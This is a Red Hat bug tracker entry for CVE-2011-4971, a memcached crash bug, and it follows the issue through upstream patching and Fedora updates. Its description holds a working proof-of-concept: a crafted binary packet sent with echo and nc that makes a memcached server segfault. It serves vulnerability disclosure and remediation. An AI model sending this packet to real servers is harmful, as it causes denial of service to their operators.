Bug 957964 (CVE-2011-4971)

Summary: CVE-2011-4971 memcached: specially crafted packet segmentation fault
Product: [Other] Security Response
Reporter: Kurt Seifried <kseifried>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED WONTFIX
Severity: low
Priority: low
Version: unspecified
CC: jfrey, jlieskov, jorton, liam, lindner, matthias, mlichvar, xlecauch
Keywords: Security
Hardware: All
OS: Linux
Doc Type: Bug Fix
Last Closed: 2021-06-11 21:05:04 UTC
Bug Depends On: 957966, 957967, 957969, 957970, 988739
Bug Blocks: 957971

Description Kurt Seifried 2013-04-30 02:07:56 UTC
This was originally reported by Stefan Bucur:

1. Start memcached in TCP mode. For example:

$ ./memcached -v -p 11211 -U 0

2. Send the specially crafted packet to it: 

$ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211

====

There is a patch mentioned in the original issue report, but the code has 
changed significantly since then.

External References:

https://code.google.com/p/memcached/issues/detail?id=192
http://insecurety.net/?p=872

Comment 1 Kurt Seifried 2013-04-30 02:09:53 UTC
Created memcached tracking bugs for this issue

Affects: fedora-all [bug 957966]

Comment 2 Kurt Seifried 2013-04-30 02:10:27 UTC
Created memcached tracking bugs for this issue

Affects: epel-5 [bug 957967]

Comment 3 Kurt Seifried 2013-04-30 02:12:22 UTC
Created memcached tracking bugs for this issue

Affects: epel-6 [bug 957969]

Comment 6 Huzaifa S. Sidhpurwala 2013-06-18 09:31:39 UTC
Proposed upstream patch (with a test):

https://code.google.com/p/memcached/issues/detail?id=192#c19

Comment 11 Miroslav Lichvar 2013-12-12 13:43:40 UTC
It seems upstream has finally accepted the patch and it's in the recently released 1.4.16. Thanks!

https://github.com/memcached/memcached/commit/6695ccbc525c36d693aaa3e8337b36aa0c784424

Comment 12 Fedora Update System 2014-02-03 02:42:28 UTC
memcached-1.4.17-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 13 Fedora Update System 2014-02-03 02:49:02 UTC
memcached-1.4.17-1.fc19 has been pushed to the Fedora 19 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 20 Product Security DevOps Team 2021-06-11 21:05:04 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2011-4971